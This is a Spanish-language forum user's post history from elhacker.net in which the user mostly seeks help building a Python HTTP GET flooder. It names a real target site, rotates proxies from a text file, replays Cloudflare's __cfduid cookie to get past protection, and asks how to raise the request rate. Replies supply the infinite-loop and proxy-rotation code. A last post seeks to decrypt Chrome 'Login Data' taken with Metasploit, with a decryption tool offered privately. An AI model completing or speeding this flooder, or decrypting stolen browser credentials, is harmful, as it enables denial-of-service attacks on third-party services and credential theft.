elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: [1] 2 3
1  Seguridad Informática / Seguridad / Help recibo ataques de denegacion de servicio en: 28 Octubre 2019, 22:52 pm
Estoy en Windows 10 en algunos de mis servidores y recibo ataques DDOS que me impiden la salida a internet, por default mi internet tiene una ip estatica asique no puedo modificarla reniciando el router..

lo que queria saber es como puedo monitorear los paquetes y detectar las IPS que estan enviados los ataques a mi NET dentro de windows 10.

he escuchado que netstat es muy buena herramienta, pero el proolema es que no puedo ejecutarla, abro el cmd como administrador escribo netstat y me dice Acceso Denegado.

Código:
C:\Windows\system32>netstat
Acceso denegado.


En si lo que nesesito saber es como poder detectar esas IPS que estan atacandome, para poder bloquearlas o algo... recuerden que estoy en un servidor Windows 10, no es linux. me podran ayudar o decir que puedo hacer para monitorear la red y detectar los ataques y la ip que estan detras de estos?


Gracias[/i]

2  Programación / Scripting / Re: como podria programar esto en Python 3? (Modulo requests) en: 27 Octubre 2019, 21:39 pm
la linea 19 tiene un espacio extra antes de la r

por otro lado cuidado, lines no está declarado fuera del with y puedes tener resultados inesperados... declaralo antes del with como

Código:
lines = None

por otro lado no recomiendo usar un for autocontenido como en la linea 12, ya que no aporta valor al codigo y dificulta su lectura, especialmente para alguien que inicia

en la linea 15,  no debes hacerle el choice a file_handle (el solo debería existir en el with con el único proposito de darle contenido a lines y no era necesario declararlo previamente, especialmente como una lista, ya que es un file handler (manejador de archivo) y no una lista), en el choice va lines

no entendi el objetivo en tu linea 18

Hola disculpa que te moleste de nuevo, estoy empezando a entender python, pero tengo una consulta, tengo este codigo que acabo de crear

Código:
url = 'https://panel.brighthost.cl'
proxy_file = 'files/proxy.txt'
proto = ''
ips = []

with open(proxy_file) as proxy:
        ips = [row.rstrip() for row in proxy]
           

while True:
        proxy = {proto: random.choice(ips)}
        req_u = requests.get(url, proxies=proxy)
        print(f'PETICION ESTADO: {req_u.status_code}, PROXY {proxy}')
        cf_cookie = req_u.cookies['__cfduid']
        cookies = dict(cookies_are=cf_cookie)
        r = requests.get(url, proxies=proxy, cookies=cookies)

Aca tambien dejo una foto



basicamente el funcionamiento es que dentro cuando ejecutas el script recorre la lista de los proxys y los guarda en un array, luego se mete en un bucle infiniito donde envia una primer peticion get y obtiene el cookie de cloudflare en este caso las cookies de cloudflare siempre suelen empezar con el nombre __cfduid

despues de eso guarda la cookie y su contenido en la variable cookies y por ultimo envia una segunda peticion GET con el mismo proxy y la cookie Asignada..


Ahora bien, basicamente supongo que te daras cuenta a lo que quiero llegar, lo que estoy haciendo o quiero lograr es un HTTP flodder, el prolema de esto es que el ciclo es demasiado lento, es decir, envia las peticiones 1 cada 1-2 segundos.. y no es suficiente la rapidez, nesesito auncrementar la velocidad del ciclo para que se repita mucho mas rapido, no se como podre lograr esto si tendre que hacerlo en un while o dentro de otra funcion.. pero basicamente quiero este mismo proceso pero mucho mas rapido.. vos me podras dar un ejemplo de como podria hacerlo?


Gracias
3  Programación / Scripting / Re: como podria programar esto en Python 3? (Modulo requests) en: 26 Octubre 2019, 21:06 pm
No sé de Python pero estoy viendo que obtienes un IdentationError y puede ser que en el While True las sentencias que van abajo del mismo no están identadas correctamente, hay doble tabulador cuando deberia ser 1 solo.

estamos iguales amigo, basicamente de python tampoco entiendo, por eso pedia una breve ayuda
4  Programación / Scripting / Re: como podria programar esto en Python 3? (Modulo requests) en: 26 Octubre 2019, 20:00 pm
Código:
file_handle = []
url = 'https://panel.brighthost.cl'

with open("files/proxy.txt", 'r') as file_handle:
lines = [line.strip() for row in file_handle]
   
while True:
proxy = {random.choice(file_handle[index])}
req_u = requests.get(url, proxies=proxy)
cf_cookie = req_u.cookies['__cfduid']
cookies = dict(cookies_are=cf_cookie)
     r = request.get(url, proxies=proxy, cookies=cookies)






¿Que estoy haciendo mal? aver si alguien sabe el error
5  Programación / Scripting / Re: como podria programar esto en Python 3? (Modulo requests) en: 26 Octubre 2019, 19:29 pm
Código:
def procesar():
   # aquí todo el codigo que te escribí con su respectivo inicio

procesar()

XD segun tu descripción eso es, no estoy seguro que es lo que quieres, pero insisto, si no sabes hacer eso, no estoy seguro como armarás el resto del programa... arma un programa y en lo que llegues a una duda, muestra tu codigo y se te ayuda a resolver

claro, pero por ejemplo como especifico el .txt y abro el txt..

nesesitaria especificar el .txt y con un for recorrerlo verdad? eso es basicamente lo que no entiendo

hagamoslo de forma manual, sin especificar argumentos.. defino una variable con la ruta y el .txt, hacelo de esa forma sencilla para que lo entienda.
6  Programación / Scripting / Re: como podria programar esto en Python 3? (Modulo requests) en: 26 Octubre 2019, 18:30 pm
ya lo que estás preguntando, es como se programa, ahi te toca estudiar como programación sobre python, lo que preguntas son probablemente los primeros capitulos

si me dieras un ejemplo lo entenderia mejor  :silbar:
7  Programación / Scripting / Re: como podria programar esto en Python 3? (Modulo requests) en: 26 Octubre 2019, 17:46 pm
lo primero un ciclo infinito
Código:
while True:
    hacer_algo()

donde hacer algo es lo que quieras, por defecto eso morirá al presionar control + c  ya que eso es para matar el programa en consola normalmente

lo de los proxy, metes todos los proxy en una lista y con un for lo vas recorriendo, tambien puedes usar un random.choice para que no sean secuenciales

en general puede ser algo como

Código:
# ... imports y otras cosas
proxies = leer_proxies()
while True:
  proxy = random.choice(proxies)
  proxy = {'http': proxy ,'https': proxy }
  r = s.get(url, proxies=proxy)


y eso se repetirá hasta que presiones ctrl+c para interrumpir la ejecución del programa



muchas gracias amigo, una duda como puedo incluir la lectura del proxy y la request en cada ciclo dentro de una funcion, asi puedo llamar a la funcion directamente y hacer todo eso junto?


perdona mi ignorancia soy nuevo en Python.. pero basicamente el objetivo es que en cada ciclo envie una request get a un sitio con un proxy distinto.


AGREGO: tambien nesesitaria saber como hago para recorrer con un for y especificar el archivo .txt
8  Programación / Scripting / como podria programar esto en Python 3? (Modulo requests) en: 26 Octubre 2019, 17:18 pm
Nesesito hacer tipo un bucle ilimitado que cuando se termine se vuelva a repetir de nuevo, hasta que canceles presionando ctrl + c..


Otra cosa que me gustaria poder hacer es que me explicasen como puedo leer un archivo .txt con diferentes proxys desde python.. y que vaya mandando peticiones GET con esos proxys uno por uno hasta que se termine el ciclo y vuelve a empezar..

en resumen: nesesito leer una archivo .txt con proxys (una por linea) y nesesito saber como armar el ciclo ilimitadamente hasta que se corte cuando vos canceles..

Utilizo Python 3, estoy usando el modulo Requests, ¿me podrian ayudar? gracias
9  Programación / Scripting / ¿Me ayudarian a crear mi herramienta en Python? (Request) en: 25 Octubre 2019, 20:15 pm
Hola, estoy aprendiendo a utilizar Python, basicamente mi objetivo es crear una herramienta en Python que haga FLOOD de peticiones HTTP GET, con un valor de cookie asignada y con una lista de proxys cargadas en .txt para que cada peticion se envie desde un proxy distinto.

Lo que quiero desarrollar es algo que logre penetrar las seguridades de Cloudflare, entonces estuve investigando y un amigo que es programador me dijo que tengo que enviar peticiones de tipo GET con el valor de la cookie de cloudflare

Generalmente cuando enviamos una peticion GET a cloudflare, sus cookies tienen de nombre __cfduid

entonces cree este simple codigo para enviar la peticion y obtener el valor del cookie __cfduid





Código:
import requests

url = 'https://panel.brighthost.cl'  //DEFINO EL DOMINIO
proxy = '217.168.128.226:8080'  //EL PROXY HTTTP
prx = {'https': 'https://'+proxy}
req_u = requests.get(url, proxies=prx) //LE DIGO QUE EL GET SEA IGUAL A EL PROXY
cf_cookie = req_u.cookies['__cfduid']  //LE INDICO QUE CF_COOKIE OBTENGA LA COOKIE __cfduid

print(f'REQUEST ESTADO: {req_u.status_code}, PROXY {proxy}, COOKIE {cf_cookie}') ) //IMPRIMO EL PROXY, EL HEADER STATUS DE RESPUESTA Y EL COOKIE

cookies = dict(cookies_are=cf_cookie
req_u2 = requests.get(url, proxies=prx,cookies=cookies)  //envio la peticion al url definido con el proxie y con el valor de cookies

print(req_u2) //imprimo



Ahora bien, lo que nesesitaria es armar el script un poco mas organizado... por ejemplo que me indique en un mensaje que introduzca el dominio, seguidamente el puerto, y seguidamente los threads



Seguidamente el archivo .txt de donde se cargaran los proxys...


basicamente nesesito eso nomas y que las peticiones GET sean enviadas con el valor del cookie __cfduid


Me ayudarian o me  orientarian como puedo armarlo? soy nuevo en python recien estoy comenzando y no conozco mucho.. pero basicamente esa es la idea
10  Seguridad Informática / Hacking / Re: Como descifro el archivo Login Data.txt generado por Metasp de google chrome? en: 22 Octubre 2019, 03:19 am
Tengo una herramienta para descifrarlos,me pasaba muy seguido y le conte a mi amigo (programador) pues resulta que creo una herramienta para descifrar esos tipos de archivo xD ¿Por donde te la paso? (si la quieres claro)

pasalo por privado bro
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines